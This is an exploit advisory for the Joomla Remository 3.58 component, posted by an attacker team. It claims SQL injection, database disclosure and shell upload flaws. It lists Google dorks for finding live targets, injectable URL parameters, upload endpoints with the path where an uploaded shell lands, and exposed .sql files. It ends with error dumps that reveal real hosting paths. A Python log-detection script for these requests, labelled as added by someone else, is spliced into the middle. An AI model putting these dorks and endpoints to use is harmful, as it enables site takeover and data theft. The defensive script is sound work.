KingSkrupellos

Joomla Remository Components 3.58 Multiple Vuln

Jan 31st, 2019
####################################################################

# Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : remository.com
# Software Download Link : remository.com/downloads/joomla-3.x-software/
# Software Information Link : extensions.joomla.org/extension/remository/
# Software Version : 3.58
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_remository''
inurl:''/administrator/components/com_remository/''
intext:Site Designed By Conservation Designs
intext:CCCV Gabriel Valencia site:gob.ec
intext:Web creada por softdream.es
intext:Sponsored by Innovatron - Managed by Spirtech
intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
intext:Web design by Mercury Web Solutions
intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019010284
packetstormsecurity.com/files/151433/Joomla-Remository-3.58-Database-Disclosure-Shell-Upload-SQL-Injection.html

####################################################################

# Description about Software :
***************************

“Remository” is open source software for Joomla.

####################################################################

# Impact :
***********

* Attackers can exploit this issue via a browser.

The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files, including shells, because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

* An attacker might be able to inject into and/or alter existing SQL statements, which would influence the database exchange.

* The SQL injection vulnerability in Joomla Remository Components 3.58 exists because the component fails to sufficiently sanitize user-supplied data before using it in an SQL query.

* Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************

/index.php?option=com_remository&Itemid=[SQL Injection]

/index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[ID-NUMBER]&orderby=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=[ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]

####################################################################

# Arbitrary File Upload Exploit :
****************************

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles

/index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]

/index.php/shared-file-repository/func-addmanyfiles/

Directory File Path :
******************

Search for your file here.

/components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php

/components/com_remository_files/......

Note : If a website is not vulnerable, it says:

You have no permitted upload categories - please refer to the webmaster

####################################################################

# Database Disclosure Exploit :
***************************

/administrator/components/com_remository/assignment.sql

/administrator/components/com_remository/blob.sql

/administrator/components/com_remository/containers.sql

/administrator/components/com_remository/file.sql

/administrator/components/com_remository/log.sql

/administrator/components/com_remository/permission.sql

/administrator/components/com_remository/repository.sql

/administrator/components/com_remository/reviews.sql

/administrator/components/com_remository/structure.sql

/administrator/components/com_remository/text.sql

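Detection sketch for the three request patterns listed above (SQL injection parameters, upload functions, .sql files), added here as an example and not part of the original advisory. It assumes Combined Log Format access logs and that the listed parameters are integers in normal traffic; the finding labels and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: these parameters are plain integers in legitimate traffic
# (the advisory's own URLs only ever show numbers in them).
NUMERIC_PARAMS = ("Itemid", "id", "cat", "orderby", "page", "no_html")
UPLOAD_FUNCS = {"addfile", "addmanyfiles"}
SQL_FILE = re.compile(r"/administrator/components/com_remository/[^/]+\.sql$", re.I)
SCRIPT_IN_UPLOADS = re.compile(r"/components/com_remository_files/.+\.(?:php\d?|phtml|phar)$", re.I)
# Request field of a Common/Combined Log Format line.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return the list of findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    path = unquote(url.path)
    params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    findings = []
    if SQL_FILE.search(path):
        findings.append("sql-file-request")
    if SCRIPT_IN_UPLOADS.search(path):
        findings.append("script-in-upload-dir")
    if "com_remository" in params.get("option", []):
        for name in NUMERIC_PARAMS:
            if any(not (v.isascii() and v.isdigit()) for v in params.get(name, [])):
                findings.append("non-numeric-" + name)
        # Uploads can be legitimate; surface them for review, not as proof.
        if m.group("method") == "POST" and UPLOAD_FUNCS & set(params.get("func", [])):
            findings.append("upload-post")
    return findings

def scan(lines):
    """Map line index -> findings, leaving out lines with no findings."""
    return {i: f for i, line in enumerate(lines) if (f := classify(line))}

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Jan/2019:10:00:00 +0000] "GET /index.php?option=com_remository&Itemid=67&func=select&id=8 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [31/Jan/2019:10:00:05 +0000] "GET /index.php?option=com_remository&Itemid=67&func=select&id=8%27 HTTP/1.1" 500 310',
    '192.0.2.11 - - [31/Jan/2019:10:00:09 +0000] "GET /administrator/components/com_remository/file.sql HTTP/1.1" 200 20480',
    '192.0.2.12 - - [31/Jan/2019:10:01:00 +0000] "POST /index.php?option=com_remository&Itemid=28&func=addfile HTTP/1.1" 200 900',
    '192.0.2.12 - - [31/Jan/2019:10:01:30 +0000] "GET /components/com_remository_files/file_image_12/0000upload.php HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A 200 response on a sql-file-request or script-in-upload-dir line is the case to triage first, since it means the server actually served the file.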
####################################################################

# Example Vulnerable Sites :
*************************

####################################################################

# SQL Database Error :
*********************

Strict Standards: Non-static method JLoader::import() should not be called statically in /home/elsemillero/public_html/nuevo/libraries/joomla/import.php on line 29

Deprecated: Assigning the return value of new by reference is deprecated in /home/epangsof/public_html/includes/joomla.php on line 836

Warning: Cannot modify header information - headers already sent by (output started at /home/epangsof/public_html/includes/joomla.php:836) in /home/epangsof/public_html/includes/joomla.php on line 697

Fatal error: Uncaught Error: Call to undefined function set_magic_quotes_runtime() in /home4/hbman23/public_html/main/includes/framework.php:21 Stack trace: #0 /home4/hbman23/public_html/main/index.php(22): require_once() #1 {main} thrown in /home4/hbman23/public_html/main/includes/framework.php on line 21

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################